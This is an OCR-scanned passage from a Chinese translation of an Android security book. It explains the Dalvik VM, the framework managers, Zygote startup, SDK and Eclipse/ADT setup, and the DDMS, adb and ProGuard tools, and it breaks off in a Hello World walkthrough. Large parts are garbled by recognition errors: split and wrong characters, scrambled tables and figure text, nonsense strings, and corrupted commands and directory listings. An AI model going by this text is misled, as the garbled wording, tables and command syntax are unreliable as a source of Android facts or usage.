运行 这 些 类 文件 ， 而 是 将 这 些 . class 格式 的 类 文件 再 次 编译 成 Dex 格式 ， 然 后 再 交 
由 Android 平台 运行 。Dex 格式 的 文件 运行 在 一 个 类 似 于 Java 虚拟 机 (Java Virtual 
Machine, JVM) 的 定制 虚拟 机 上 ， 即 Dalvik 虚拟 机 。 典 型 的 Java 虚拟 机 和 Dalvik 
虚拟 机 的 编译 步骤 是 不 同 的 ， 两 者 之 间 的 区 别 如 图 2.6 所 示 。Dalvik 虚拟 机 基于 
Linux 内 核 提 供 更 底层 的 功能 ， 如 内 存 管理 。 























编译 Ji. class 


应 用 程序 代码 文件 


人 (Java 语言 











px class vr 
B 213 E .dex 在 DVM 中 
运行 









应 用 程序 代码 


(Java 语 言 ) 





编译 成 .class 文 件 .Class 在 JVM 中 运行 


图 2.6 Java 虚拟 机 (JVM) 和 Dalvik 虚拟 机 (DVM) 编译 过 程 对 比 





Android 包含 一 组 核心 库 ， 提 供 了 Java API (Application Programming Interface, 
应 用 程序 编程 接口 ) 中 的 大 部 分 功能 。 相 比 于 J2SE，Android 核心 库 所 提供 的 API 
是 Java API 的 一 个 精简 版 本 。 例 如 ，Android 核心 库 不 支持 Swing 或 AWT 图 形 接 
口 ， 但 却 增 加 了 Android 特有 的 库 ， 如 SQLite, OpenGL E, ERARI, tE 
用 J2SE 的 部 分 API 会 导致 较 高 的 资源 开销 ， 而 使 用 J]2ME 则 不 仅 需要 获得 相关 使 
用 授权 许可 ， 而 且 还 会 存在 一 定 的 安全 隐患 。 如 果 使 用 J2ME， 就 需要 为 每 一 部 设 
备 向 Oracle 支付 授权 许可 费用 。 而 且 ， 出 于 安全 考虑 ，Android 应 用 程序 应 当 需 要 
仅 能 在 Google 自己 开发 的 虚拟 机 (Dalvik 虚拟 机 ) 上 和 运行， 如 果 使 用 J2ME， 那 么 
Android 应 用 程序 就 需要 在 别人 的 虚拟 机 (如 JVM) 上 运行 ,这样 就 可 能 导致 安全 
沙 箱 2 功能 的 弱化 ， 从 而 存在 一 定 的 安全 隐患 。 


2.1.4 应 用 程序 框架 层 


Android 应 用 程序 框架 层 通过 Java API 提供 了 一 组 功能 丰富 的 类 ， 供 开发 人 员 
在 应 用 程序 中 调用 。 这 些 类 的 功能 主要 通过 该 层 的 各 种 应 用 程序 管理 服务 实现 ， 其 
中 ， 最 重要 的 管理 服务 组 件 包 括 活动 管理 器 (Activity Manager) 、 资 源 管理 器 ( Re- 










































































”安全 沙 箱 ， 是 一 种 按照 安全 策略 限制 程序 行为 的 执行 环境 ， 可 以 理解 为 一 种 安全 环境 。 一 一 译 者 注 
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source Manager), 、 位 置 管理 需 (Location Manager) FMEA Es (Notification Man- 
ager) ， 该 层 主要 的 管理 服务 及 其 功能 说 明 见 表 2.3, 


表 2.3 Android 应 用 程序 框架 层 的 管理 服务 

























































































服 5 说 —0Hj 
管理 应 用 程序 和 应 用 组 件 的 Activity 生命 周期 ， 当 应 用 程序 需要 
Activity Manager (活动 管理 需 ) 启 一 个 Activity 时 ( 如 通过 调用 startActivity ( ) 函数 ) ， 活 动 管理 器 提 
供 相 应 服务 功能 
提供 对 本 地 资源 的 访问 功能 ， 如 字符 串 、 区 局 文件 等 本 
Resource Manager. (资源 管理 器 ) | - 对 本 地 资源 的 访问 功能 ， 如 字符 图 片 和 布局 文件 等 本 地 
资源 
Location Manager (位 置 管理 器 ) 提供 对 位 置 更 新 的 支持 服务 ， 如 GPS 等 











为 应 用 程序 提供 显示 事件 通知 的 功能 ， 例 如 ， 当 应 用 程序 想 要 显示 


Notification Manager (OMNES Jg 
xa gm ( á 新 邮件 到 来 事件 ， 就 可 以 使 用 通知 管理 器 提供 的 服务 
























































包 管理 器 连同 安装 程序 ( 即 包 管 理 后 台 进 程 ) 一 起 用 于 应 用 程序 
的 安装 ， 维 护 已 装 应 用 程序 及 其 组 件 的 信息 


























Package Manager ( 包 管 理 器 ) 



































使 应 用 程序 可 以 访问 另 一 个 应 用 程序 的 数据 (如 联系 人 数据 库 ) ， 
Content Providers ( 内容 提供 者 
ten Provides (WARRE) | 或 者 共享 它们 自己 的 数据 
Views (视图 ) 提供 一 组 丰富 的 视图 ， 供 应 用 程序 使 用 显示 信息 











2.1.5 应 用 程序 层 


默认 情况 下 ，Android 系统 会 自 带 一 组 功能 丰富 的 应 用 程序 ， 包 括 浏览 器 、 短 

言 息 程序 、 日 历 、 邮 件 客 户 端 、 地 图 应 用 、 联 系 人 、 音 乐 播放 器 等 ， 这 些 程序 都 是 
使 用 Java 语言 编写 的 。 如 果 用 户 愿 意 ， 还 可 以 使 用 Google Play (EP Android 应 用 软 
件 市 场 ) 下 载 其 他 的 应 用 替换 它们 。Android 系统 不 会 区 分 应 用 程序 是 否 是 用 户 编 
写 还 是 系统 自 带 的 ， 就 像 浏览 融 。 用 户 能 够 下 载 火狐 、Opera 或 是 其 他 浏览 器 ， 对 
于 Android 系统 来 说 ， 这 些 浏览 器 同系 统 内 置 的 浏览 器 都 会 被 同等 对 待 ， 用 户 可 以 
自己 选择 软件 替换 那些 默认 安装 好 了 的 软件 。 本 书 会 在 第 3 章 详细 讨论 Android 应 
用 程序 的 体系 结构 。 














2.2 Android 系统 启动 与 Zygote 


前 面 已 经 讨论 过 了 ，Android 系统 不 是 Linux 系统 ， 而 仅仅 是 基于 Linux 内 核 构 
建 的 ， 两 者 之 间 既 有 相同 之 处 ， 也 存在 很 大 的 不 同 。 所 有 的 Android 应 用 程序 在 内 
核 中 都 是 一 个 底层 的 Linux 进程 。 每 一 个 应 用 程序 在 运行 时 都 作为 一 个 单独 的 进程 
(少量 程序 除外 ) ， 默 认 情 况 下 ， 每 个 进程 中 至 少 有 一 个 线程 。 同 大 多 数 基于 Linux 
的 系统 一 样 ，Android 系统 启动 时 ， 引 导 装 载 咒 (boot loader) 负责 加 载 内 核 (HB 
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为 Android 系统 量 身 改进 的 Linux 内 核 ) ， 之 后 启动 init 进程 〈 也 称 为 初始 进程 ) 。 
所 有 其 他 的 进程 都 是 由 init 进程 产生 的 ， 该 进程 生成 很 多 后 台 进 程 ， 如 adb, USB, 
以 及 其 他 硬件 的 后 台 进 程 。 在 这 些 后 台 进程 启动 之 后 ，init 进程 再 启动 Zygote 进 
程 。 再 由 Zygote 进程 启动 第 一 个 Dalvik 虚拟 机 并 预先 加 载 所 有 的 核心 类 ， 供 应 用 
程序 调用 。 之 后 ，Zygote 监听 socket 接口 ， 等 待 新 Dalvik 虚拟 机 的 启动 请 求 。 

当 一 个 新 的 应 用 程序 启动 时 ，Zygote 将 收 到 新 Dalvik 虚拟 机 的 启动 请 求 。 此 
时 ，Zygote 会 分 裂 出 一 个 新 的 进程 ,该 进程 继承 了 之 前 已 经 初始 化 并 启动 运行 的 
Dalvik 虚拟 机 代码 。 由 于 新 的 进程 只 是 继承 了 之 前 已 经 初始 化 并 运行 的 Dalvik 虚拟 
机 代码 ， 并 没有 重新 复制 所 需 的 共享 库 ， 除 非 应 用 程序 需要 修改 这 些 共享 库 ， 否 
则 ， 启 动 新 的 Dalvik 虚拟 机 不 会 导致 系统 速度 放 缓 。init 进程 启动 Zygote 进程 之 
后 ，Zygote 进程 将 分 裂 出 一 个 名 为 “system server” 的 进程 ， 再 由 该 进程 启动 所 有 
Android 的 核心 服务 ， 如 Activity 管理 絮 等 。 当 所 有 的 核心 服务 启动 完毕 ，Android 
平台 就 能 够 运行 用 户 打 开 的 应 用 程序 ， 每 个 应 用 程序 的 启动 都 会 使 Zygote 分 裂 出 
新 的 进程 并 创建 一 个 新 的 Dalvik 虚拟 机 。 














2.3 Android SDK 及 开发 工具 


本 节 将 搭建 Android 应 用 程序 的 开发 和 运行 环境 ， 虽然 本 节 所 述 工具 主要 针对 
应 用 程序 开发 人 员 ， 但 是 对 于 普通 用 户 来 说 ， 在 对 Android 应 用 程序 进行 安全 检查 
时 ， 熟 悉 并 能 使 用 这 些 工具 也 是 相当 重要 的 。 本 节 结 束 时 ， 读 者 应 该 能 够 在 自己 的 
电脑 上 搭建 Android 环境 ， 并 可 以 开发 、 编 译 、 运 行 和 调试 应 用 程序 。 

Android 环境 的 主要 组 成 部 分 如 下 : 

1) Android SDK (Software Development Kit， 软 件 开 发 工具 包 ) 。 

2) Eclipse 集成 开发 环境 及 ADT (Android Development Tool, Android 开发 
工具 ) 。 

3) 其 他 开发 工具 ,包括 DDMS, 、logcat 等 。 


2.3.1 Android SDK 下 载 与 安装 


Android SDK 用 于 开发 和 运行 Android 应 用 程序 3 包括 Android 库 、 工 具 以 及 范 
例 程序 ， 用 户 可 从 Android 网 站 上 免费 下 载 。 使 用 Android SDK 之 前 ， 必 须 安装 
Java SDK, Android SDK 的 安装 步骤 如 下 : 

1) 下 载 适 合 自己 电脑 操作 系统 (如 Windows, Mae 或 Linux 系统 ) 的 SDK, 
如 果 你 的 系统 是 64 位 版 本 的 Windows 系统 ， 安 装 过 程 可 能 会 有 一 点 不 同 ， 不 过 该 
过 程 仍 然 是 非常 简单 的 。 对 于 Mac 和 Linux 系统 ， 需 要 先 将 SDK 安装 包 解 压 到 预 
期 目标 路 径 下 ， 然 后 使 用 解压 完毕 目录 内 的 Android 工具 进行 安装 。 各 种 实用 工具 
位 于 解压 目录 下 的 tools 文件 夹 中 ， 如 图 2.7 所 示 。 
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anmmisra-mac;android-sdk-macosx Anmol$ ls 


SOK Readme.txt add-ons 


anmmisra-mac:;android-sdk-macosx Anmol$ ls 


total 13056 
drwxrwx- - -& 
-DW-DW----8 
-rW-nWw----8 
*PWXPWX r X8 
drwxrwx- -~ 多 
-rwWXrwxr ^ X 
drwxrwx- - -& 
-rWXxrwxr -x& 
-DWXPWXn- x& 
-DNXPDWXP- Xe 
-PWXPWXnr-x& 
-rWxnrwxr-x& 
-DWXPWXP - x& 
-DWXPCWXD-XB 
-TWXTWXTr - x& 
-rWXrwxr -x& 
drwxrwx- ~- 全 
"PWXPWXD - X& 
-PWXTWXr - XE 
-rwXxrwxr-x& 
drwxrwx- = -& 
-DWerWwen--8 
-DWXDCWXP-xG 
drwxrwx- --& 
-DWXPWXP - x& 
-DWXDWXP -XÈ 
anmmisra-mac: 
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图 2.7 


2) 更 新 环境 
路 径 / platform- tools" 
提供 的 Android 工具 。 
3) 在 命令 行 中 输入 “ 








路 径 ， 








and 


2619568 


602716 


platforms 


170 Mar 
330887 Mar 
323 Mar 
3491 Mar 
170 Mar 
1977 Mar 
102 Mar 
3116 Mar 
52516 Mar 
1940 Mar 
45752 Mar 
719756 Mar 
Mar 
Mar 
Mar 
Mar 
Mar 
Mar 
Mar 
Mar 
Mar 
Mar 
Mar 
102 Mar 
3044 Mar 
61636 Mar 


150488 
3282 
17408 
2108 
2015 
17256 
3169 
340 

66 


CTIITIIIIITIIIITIIIITITIITI. 
333333333333338833333333333 


android-sdk-macosx Anmol$ [] 





tools 
“1 tools/ 


Jet 

NOTICE.txt 

adb has moved.txt 
android 

ant 

apkbuilder 

apps 

ddms 
dmtracedump 
decaw9patch 
emulator 
emulator-arm 
emulator-x86 
etcitool 
hierarchyviewer 
hprof-conv 

lib 

lint 

mksdcanrd 
monkeyrunner 
proguard 
source, properties 
sqlite3 

support 
traceview 
zipalign 





roid” 





命令 


变量 PATH, TE PATH 变量 中 增加 “ < 
这 样 即 使 在 SDK 目录 外 ， 也 能 通过 


和 “<SDK 
命令 行 调 用 这 些 SDK 


SDK 路 径 /tools" 

















启动 SDK 管理 器 ， 选 择 想 要 下 载 的 An- 





droid 版 本 ， Android SDK 管理 器 界面 如 图 2.8 所 示 。 





要 想 开 始 使 用 Android， 首 先 需要 利用 SDK 管 ] 


( Android Virtual Device, AVD), 
理 器 中 使 用 AVD 管理 器 启动 它 


命令 启动 Android 模拟 器 。 nem [RE d: 


理 器 创建 一 个 Android 模拟 器 





如 图 2.9 所 示 。AVD 创建 之 后 ， 就 可 以 在 SDK 管 


， 当 然 ， 用 户 也 可 以 直接 在 命令 行 输入 
具有 完整 的 Android 软件 栈 功 能 ， 用 于 测 





























“emulator” 


试 和 调试 Android 应 用 程序 。 如 果 身 边 没 有 真实 的 Android 设备 ， 使 用 Android 模拟 


器 会 很 方便 。 


2.3.2 Eclipse 和 ADT 开发 环境 





Eclipse 是 一 个 开源 的 集 
IDE) ， 附 带 大 量 有 助 于 程序 开 
插件 ， 还 可 以 使 








成 开发 环境 


发 的 工具 ， 广 受 Java 程序 员 的 欢 
如 C、C++、 





EHjJ 其 他 编程 语言 Fi 开发 程序 ， 





i (Integrated Development Environment, 

















迎 。 通 过 Eclipse 的 
PHP 等 。 本 书 推荐 使 用 
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图 2.8 Android SDK 管理 器 


„Android Virtual Device Manager j 








List of existing Android Virtual Devices located at /Users/Anmol/.android/avd 





Target Name ET 














图 2.9 建立 一 个 新 的 Android 模拟 器 
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Eclipse 的 标准 开发 环境 开发 Android 应 用 程序 ， 用 户 可 从 http://www. eclipse. org/ 
downloads/ 网 站 下 载 Eclipse 软件 。 

使 用 Eclipse 开发 或 检查 Android 应 用 程序 ， 还 需要 下 载 安 装 ADT ( Android 
Development Tool, Android 开发 工具 ) 插件 ， 安 装 步骤 如 下 : 

1) 打开 Eclipse 软件 ， 依 次 选择 “Help- > Install New Software”。 

2) 如 图 2. 10 所 示 ， 点击 “Add…” 按钮 添加 URL: "https: //dl- ssl. google. com/ 
android/ eclipse/” 。 

3) 在 下 拉 列 表 框 内 ， 人 勾 选 “Developer Tools”， 并 且 点 击 “Next > ”按钮 ， 接 
受 协议 并 点 击 “Finish” 按 钮 。 

4) 依次 选择 “Eclipse - > Preferences - > Android”， 点 击 “Browse…” 按钮 选 
TÉ SDK 安装 路 径 。 








Available Software 
Check the items that you wish to install. 





Work with: [ADT -https//di-sslgoogleom/android/edipse/ | v) (owe 1] 
Find more software by working with the "Available Software Sites" preferences. 





tyi e filter text /—————————————————— € 


y Android DDMS 18.0.0./201203301601-306762 
“y Android Development Tools 18.0.0./201203301601-306762 
E Android Hierarchy Viewer 18.0.0.v201203301601- 306762 
"Xy Android Traceview 18.0.0.v201203301601-306762 








Select All Deselect All 4 items selected 








I Show only the latest versions of available software (2 Hide items that are already installed 
图 Group items by category What is already installed? 
[7 Contact all update sites during install to find required software 





© ) d) ( me 0) [Fnsh | 








&[2.10 Eclipse 的 ADT fifi FH BEBUJT A TR. 








2.3.3 Android 工具 
Android SDK 提供 很 多 有 用 的 工具 用 于 Android 应 用 程序 的 开发 、 测 试 和 分 析 ， 
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主要 工具 的 介绍 见 表 2.4。 本 书 不 会 对 所 有 工具 进行 详细 讨论 ， 仅 详细 讨论 与 本 书 
主题 相关 的 三 个 主要 的 工具 ， 包 括 DDMS (Dalvik Debug Monitoring Service, Dalvik 
虚拟 机 调试 监控 服务 ) ADB (Android Debug Bridge, Android 调试 桥接 器 ) 和 Pro- 
Guard。 表 2.4 总 结 了 SDK 提供 的 这 些 工 具 及 其 用 途 。 通 过 Eclipse 的 ADT 插件 ， 
用 户 可 以 在 Eclipse 上 使 用 这 些 工具 ,尤其 是 Eclipse 上 的 DDMS 视图 窗口 ， 能 够 显 
示 Android 应 用 程序 在 Dalvik 虚拟 机 上 的 运行 信息 。 相 应 工具 的 详细 信息 请 参考 下 
述 网 站 : 
http :// developer. android. com/ guide/ developing/ tools/ index. html 














表 2.4 SDK 提供 的 Android 工具 
































E H 用 法 
android 用 于 从 命令 行 启动 SDK 管理 器 ， 管 理 AVD 以 及 安装 其 他 SDK 组 件 
emulator 用 于 在 电脑 上 启动 移动 设备 模拟 器 ， 适 用 于 手边 没有 真实 移动 设备 的 情况 
































用 于 调试 Android 应 用 程序 ， 提 供 端口 转发 、 设 备 屏 幕 截取 、 设 备 线程 和 堆 信息 、 
logcat、 进 程 和 基带 信号 状态 信息 、 来 电 和 短信 模拟 、 位 置 数据 模拟 等 功能 服务 








ddms 

























































































hierarchyviewer 用 于 调试 和 优化 应 用 程序 的 用 户 界面 
hprof- conv 用 于 将 Android 输出 的 HPROF 文件 转化 成 分 析 工 具 能 够 识别 查看 的 标准 格式 
sqlite 用 于 查看 Android 应 用 程序 使 用 或 创建 的 sqlite3 数据 库 
用 于 通过 命令 行 同 模拟 器 或 移动 设备 通信 ，adb 是 一 个 C/S (客户 端 / 服 务 器 ) 模 




















式 的 程序 ， 可 以 让 开发 者 使 用 电脑 (作为 adb 客户 端 ) 同 模拟 器 或 真实 设备 (作为 
adb 服务 器 ) 进行 交互 。 例 如 ， 用 户 可 以 通过 adb shell 以 命令 的 形式 安装 Android 应 


adb 



















































































用 程序 、 查 看 目标 设备 的 进程 信息 等 
proguard Android 提供 的 内 置 的 代码 混淆 工具 
traceview 图 形 分 析 工 具 ， 用 于 查看 应 用 程序 的 日 志 信 息 
dx 用 于 将 .class 字 节 码 转 化 成 可 以 在 Dalvik 虚拟 机 上 运行 的 . dex 字 节 码 文 件 
mksdcard 用 于 创建 模拟 器 使 用 的 SD 卡 磁盘 镜像 文件 
2.3.4 DDMS 


借助 模拟 器 或 手机 屏幕 能 够 使 用 户 在 UI (User Interface， 用 户 接口 或 人 机 交互 
接口 ， 这 里 指 的 是 应 用 程序 的 用 户 界面 ) 层面 上 查看 应 用 程序 的 行为 和 功能 。 但 
是 ， 要 想 了 解 UI 背后 的 应 用 程序 运行 细节 ， 就 需要 使 用 DDMS TH, DDMS 工具 
具有 强大 的 功能 ,使 用 它 可 以 获得 进程 运行 的 详细 人 信息、 堆栈 信息 ， 以 及 浏览 查看 
模拟 器 或 相连 的 移动 设备 的 文件 系统 等 。 此 外 ， 通 过 Eclipse 的 ADT 插件 ， 用 户 还 








© adb shell, Z& adb 提供 的 shell 程序 ， 用 于 用 户 通过 它 使 用 命令 同 Android 基于 的 Linux 内 核 进行 交互 ， 
类 似 于 Windows 系统 上 的 命令 提示 符 窗口 ， 或 是 Linux 系统 上 的 bash。 一 一 译 者 注 
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可 以 访问 loget 工具 产生 的 设备 (或 模拟 器 ) T 日 志 记 录 。 

在 Linux 或 Mac 系统 上 ， 用 户 可 以 在 命令 行 窗口 中 输入 “ddms” 命 令 启 动 
DDMS 工具 ， 如 图 2. 11 所 示 。 也 可 以 在 Eclipse 软件 上 使 用 ADT 插件 访问 DDMS 视 
图 窗口 ， 如 图 2. 12 所 示 。 从 图 2. 11 中 可 见 ， 通过 DDMS 可 以 获得 在 模拟 器 或 真实 
设备 上 运行 进程 的 大 量 信息 息 ， 图 中 左上 角 区 域 显 示 的 是 正在 运行 的 进程 列表 ， 点 击 
任意 进程 即 可 查看 该 进程 的 相关 信息 。 该 图 中 的 进程 列表 内 显示 有 各 个 进程 的 ID 
和 进程 名 。 例 如 ， 点 击 名 为 com. Adam. CutePuppiesWallpaper 的 进程 ， 可 以 在 右边 
窗口 中 使 用 各 种 标签 查看 该 进程 的 堆栈 信息 和 与 之 关联 的 线程 信息 等 。DDMS 还 可 
以 显示 详细 的 模拟 器 事件 信息 。 例 如 ， 在 该 图 中 ， 当 壁纸 应 用 程序 启动 后 ， 即 可 在 
窗口 下 方 的 Log 日 志 记录 信息 中 看 到 MCS_BOT_Service 服务 随 之 启动 。 随 后 ，Log 
日 志 窗 口内 显示 系统 抛 出 未 知 主机 异常 : k2homeunix. com 无 法 访问 (EP “Unknown 
Host Exception; k2homeunix. com") ， 继 而 ， 壁 纸 应 用 程序 退出 关闭 。 


Dalvik Debug Monitor 























DDM-aware? yes 
App description: com.adam.CutePuppiesWallpaper 
ion: Dalvik v1.4.0 
386 























ectToServer(BotClient java:48) 


at com.adam CutePupplesWalipaper. iot Client java:63) 
Systemer at com adam. CutePuppiesWalipaper KE, BotService java:37} 
Systemer atam sdroid. app. Servi ice. on iStartCommandt (service. java: 428) 




















图 2.11 Android SDK 提供 的 DDMS 工具 


2.3.5 adb 
adb 是 一 个 客户 端 - 服 务 器 程序 ， 用 于 同 Android 模拟 器 或 真实 设备 进 


st 
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Android CheckJNI is ON 
04-29 23:02:16 AndroidR Calling main entry com.android.commands.pm.Pm 
04-29 23:02:16 AndroidR Shutting down VM di 
04-29 23:02:16 dalvikvm GC CONCURRENT freed 179K, 71% free 298K/1024K, external i 
04-29 23:02:16 dalvikvm Debugger has detached; object registry had 1 entries 
[ dR NOTE: at f thread 'Binder Thread #3' failed 
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2011-02-03 
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图 2.12 Eclipse ADT 上 的 DDMS 视图 窗口 


互 ， 主 要 由 三 部 分 构成 : adb 后 台 进程 (Hü/sbin/adbd 程序 ) fE Android 设备 
或 模拟 右上 运行 ; adb 服务 ， 在 开发 系统 ( 即 个 人 电脑 ) 上 运行 ; 客户 端 程 
序 ， 如 adb 或 ddms 工具 ， 同 样 运行 在 开发 系统 上 ， 使 用 adb 服务 同 adb 后 台 进 
程 通信 。 

借助 adb 可 以 通过 adb shell 在 模拟 器 或 设备 上 执行 交互 性 的 命令 ， 如 安装 apk 
文件 9 、 提 取 / 推 送 〈 将 文件 放 进 模拟 器 或 真实 设备 ) 文件 ， 以 及 执行 其 他 shell 命 
令 弓 。 模 拟 器 上 运行 的 adb shell 拥有 root 权限 ， 可 以 访问 模拟 器 上 的 任何 文件 ， 具 
有 最 高 的 操作 权限 。 相 反 ， 在 真实 设备 上 ，adb shell 默认 提供 一 般 用 户 权 限 ， 只 能 
使 用 有 限 的 功能 操作 ， 对 于 一 些 敏 感 操作 则 没有 权限 执行 9。 

使 用 adb 可 以 执行 的 一 些 重要 命令 见 表 2.5。 全 部 命令 请 参阅 网 站 : http: // 
developer. android. com/guide/ developing/tools/adb. html 提供 的 文档 。 























© apk 文件 即 Android 应 用 程序 的 发 布 形 

的 压缩 文件 。 一 一 译 者 注 
O Eheb shell 命令 ， 如 一 些 常用 的 Linux fp, ls, ed 等 一 一 译 者 注 
OG 用 户 权限 方面 的 知识 请 参阅 Linux 相关 书籍 。 一 一 译 者 注 


~ 








式 ， 每 一 个 Android 应 用 程序 的 安装 包 是 一 个 以 . apk 为 扩展 名 
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FH 
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k25 主要 的 adb 命令 


用 途 adb 命令 








adb [-d] [-e] [-s < 设备 序列 号 > ] 命令 ， 用 于 激活 adb 客户 端 ， 当 有 
发 布 adb 命令 多 个 Android 设备 或 模拟 器 运行 时 ，-d 选项 用 于 指定 命令 执行 的 目标 设 
备 ，-e 选项 表示 命令 将 直接 被 用 在 模拟 器 上 执行 





















































adb devices, 于 显示 所 有 已 经 连接 的 Android 设备 和 模拟 器 的 序列 号 ， 
以 及 它们 的 状态 信息 ， 如 离线 (offline) 和 在 线 (device) 




















打印 相连 设备 列表 














adb-s emulator-5556 install helloworld. apk ， 用 于 在 指定 序列 号 的 Android 
安装 应 用 程序 (apk) 设备 上 安装 应 用 程序 ， 这 里 指 将 helloworld. apk 程序 安装 到 序列 号 为 emu- 
lator-5556 的 模拟 器 上 

















adb pull < remote > < local > 和 adb push «local > < remote >, adb pull 将 
模拟 器 或 设备 上 的 « remote > 路 径 指 定 的 文件 复制 到 本 地 磁盘 < local > 路 
径 ，adb push 将 本 地 磁盘 <local > 路 径 指定 的 文件 复制 到 模拟 器 或 设备 的 
< remote > 路 径 下 


查看 日 志 信息 adb logcat， 用 于 在 屏幕 上 打印 模拟 器 或 设备 的 日 志 记 录 


adb shell < command > ， 用 于 在 模拟 器 或 真实 设备 上 执行 指定 的 shell 命 
令 ， 例 如 adb shell ps 将 显示 模拟 器 或 设备 上 运行 的 进程 列表 


从 /向 模拟 器 或 设备 复制 文件 





























可 交互 的 shell 命令 




















adb shell sqlite3 ， 开 启 SQLite 数据 库 自 有 的 命令 行 工具 ， 即 sqlite3。 通 


检查 SQLite 数据 库 ; . 
人 过 sqlite3 命令 行 工具 可 以 分 析 模 拟 器 或 真实 设备 系统 上 的 SQLite 数据 库 






































2.3.6 ProGuard 


ProGuard 是 Android SDK 提供 的 代码 混淆 工具 ， 由 于 Java 类 文件 很 容易 被 反 编 
译 ， 因 此 在 开发 编译 应 用 程序 时 ， 执 行 代码 混淆 是 防止 程序 被 反 编译 的 一 个 很 好 的 
方法 。ProGuard 工具 通过 删除 一 些 没 用 的 代码 和 修改 类 、 变 量 和 函数 的 名 称 ， 实 现 
代码 压缩 、 优 化 和 混淆 的 功能 ， 这 样 可 以 使 别人 在 对 应 用 程序 进行 逆向 工程 中 消耗 
更 多 的 时 间 ， 从 而 达到 保护 代码 安全 的 目的 。ProGuard 的 激活 步骤 概括 如 下 : 

1) 下 载 并 安装 最 新 的 SDK。 使 用 旧版 本 SDK 创建 的 工程 ， 在 后 续 执 行 混淆 操 
作 时 ， 可 能 会 出 现 问 题 。 如 果 创 建 的 应 用 程序 使 用 的 SDK 已 经 是 最 新 版 本 ， 那 么 
请 直接 跳 转 到 步骤 4。 

2) 如 果 工 程 使 用 的 是 旧版 本 的 SDK 创建 的 ， 则 需要 更 新 该 工程 。 执 行 下 述 命 
令 ， 将 会 显示 一 组 Android API 版 本 列表 ， 然 后 选择 与 已 用 SDK 版 本 相 适 应 的 API 
版 本 : 

D: eclipse workspace > android. bat list targets\ 

3) 使 用 所 选 的 API 版 本 更 新 之 前 创建 的 工程 ， 命 令 如 下 : 


D: \eclipse \ workspace > android update project —name Hello World 一 target 3 一 
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path D:\eclipse\workspace\HelloWorld'\ 
4) 在 创建 的 工程 根 目录 下 ， 执 行 ant 命令 : 
D: Veclipse \workspace \HelloWorld Vant 
5) 修改 本 地 . properties 文件 ， 增 加 如 下 代码 : 
proguard. config = proguard. cfg 
6) 使 用 发 布 模式 编译 工程 ， 命 令 如 下 : 


ant release 


2.4 “Hello World” 应 用 程序 详解 


通过 剖析 简单 的 “Helloe World” 应 用 程序 ， 可 以 熟悉 Android 工程 和 应 用 程序 
中 的 各 种 文件 和 组 件 。 创 建 一 个 “Hello World” 应 用 程序 ， 首 先 需要 打开 Eclipse 
软件 ， 将 所 需 的 API 版 本 设置 成 编译 目标 (所 需 的 API 版 本 ， 也 就 是 对 外 发 布 的 
Android 系统 版 本 ， 应 用 程序 代码 将 在 所 选 的 Android 版 本 系统 上 运行 )， 然 后 输入 
应 用 程序 名 和 包 名 。 上 述 操作 完成 之 后 ， 创 建 的 Android 项 目的 根 目 录 下 将 包含 类 
似 于 表 2.6 中 的 日 录 ， 其 中 /res 目录 下 的 两 个 文件 AndroidManifest. xml. 和 
strings. xml 对 Android 的 安全 性 具有 重要 的 意义 


表 2.6 Android 应 用 程序 目录 解析 
























































X dox 描 $ 
存放 应 用 程序 的 源码 文件 ， 本 例 中 ，HelloActivity. java 文件 存放 于 该 文件 夹 
gen 存放 由 /res 文件 夹 内 的 资源 文件 生成 的 代码 
Android 2. 3. 3 存放 目标 Android 系统 版 本 的 android. jar 文件 
assets 存放 用 于 同 应 用 程序 拥 绑 发 布 的 其 他 文件 
































用 于 编译 、 运 行 应 用 程序 ， 存 放 Android 应 用 程序 安装 包 ， 即 apk 文件 ， 以 及 
应 用 程序 编译 之 后 的 classes. dex 文件 


bin 


























存放 应 用 程序 所 需 的 资源 文件 ， 包 括 布局 文件 (layout) 、 赋 值 文件 ( 即 value, 
如 字符 串 等 ) 和 图 像 文件 (drawable) 等 。 布 局 、 字 符 串 以 及 其 他 的 资源 定义 在 
xml 文件 中 ， 编 译 时 系统 会 自动 将 这 些 资源 编程 成 R (R. class 文件 ) 的 变量 
res FERHAD, TERRAS p ECBEEH Java 语句 调用 资源 ID ， 即 可 访问 
这 些 资 源 文件 。 安 全 专员 往往 对 strings. xml 文件 更 感 兴趣 ， 因 为 该 文件 用 于 定义 
应 用 程序 使 用 的 字符 串 ， 而 很 多 应 用 程序 会 把 敏感 字符 串 信 息 放 在 该 文件 中 ， 只 
需 使 用 简单 的 逆向 工程 技术 就 能 获取 这 些 字符 串 信 息 ， 导 致 信息 泄露 





























































































































该 文件 定义 了 Android 应 用 程序 的 各 种 组 件 (如 Activity, Service 和 Broadcast 
AndroidManifest xml Receiver 等 ) 、 包 信息 、 同 其 他 应 用 程序 交互 的 权限 、 调 用 本 地 受 保护 API 的 权 
限 ， 以 及 其 他 应 用 程序 访问 本 应 用 程序 组 件 的 权限 















































proguard- project. txt 用 于 ProGuard 的 配置 文件 
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2.4.1 认识 “Hello World" 程序 


本 节 将 通过 分 析 “Hello World” 程 序 源 码 ， 了 解 其 运行 的 大 体 过 程 。 几 乎 每 
一 个 Android 应 用 程序 的 核心 都 是 Activity 组 件 。 

Activity 是 一 个 单独 的 屏幕 界面 ， 该 组 件 基 于 设备 屏幕 同 用 户 进 行 交互 。 例 如 ， 
登录 Twitter 软件 时 ， 用 户 输入 账号 和 密码 的 屏幕 界面 。 

通常 对 于 一 个 应 用 程序 来 说 ， 会 由 多 个 Activity 组 件 构 成 ， 每 一 个 Activity 就 是 
屏幕 上 显示 的 一 个 界面 。 但 对 于 简单 的 应 用 程序 来 说 ， 以 “Helle World” 程 序 为 
例 ， 也 可 以 只 有 一 个 Acetivity， 即 只 有 一 个 屏幕 显示 界面 ， 用 于 显示 “Hello World, 
HelloWorldActivity” 字 符 串 。 程 序 启动 时 ， 屏 幕 上 即 显 示 上 述 字 样 并 在 logcat 窗口 
中 写 人 “Hello Logcat” 日 志 信 息 。 

图 2. 13 显示 了 HelloWorldActivity 的 屏幕 显示 界面 ， 其 源码 如 代码 段 4 所 示 。 
首先 ， 定 义 了 包 名 “com. androidsecurity. helloworld”。 然 后 ， 导 入 该 程序 所 需 的 功 
能 类 ， 有 些 类 是 必须 导入 的 ， 如 “android. app. Activity” 类 ， 其 他 类 取决 于 应 用 程 
序 的 功能 需求 ， 如 “android. util. Log" 类 ， o 日 志 功 能 ， 可 以 不 导入 
该 类 。Activity 是 基 类 ， 用 于 应 用 程序 在 屏幕 上 显示 可 视 的 组 件 或 UI。 本 应 用 程 
序 的 Activity 类 ( 即 “HelloWorldActivity” 类 需要 继承 该 基 类 ， 重 写 父 类 的 on- 
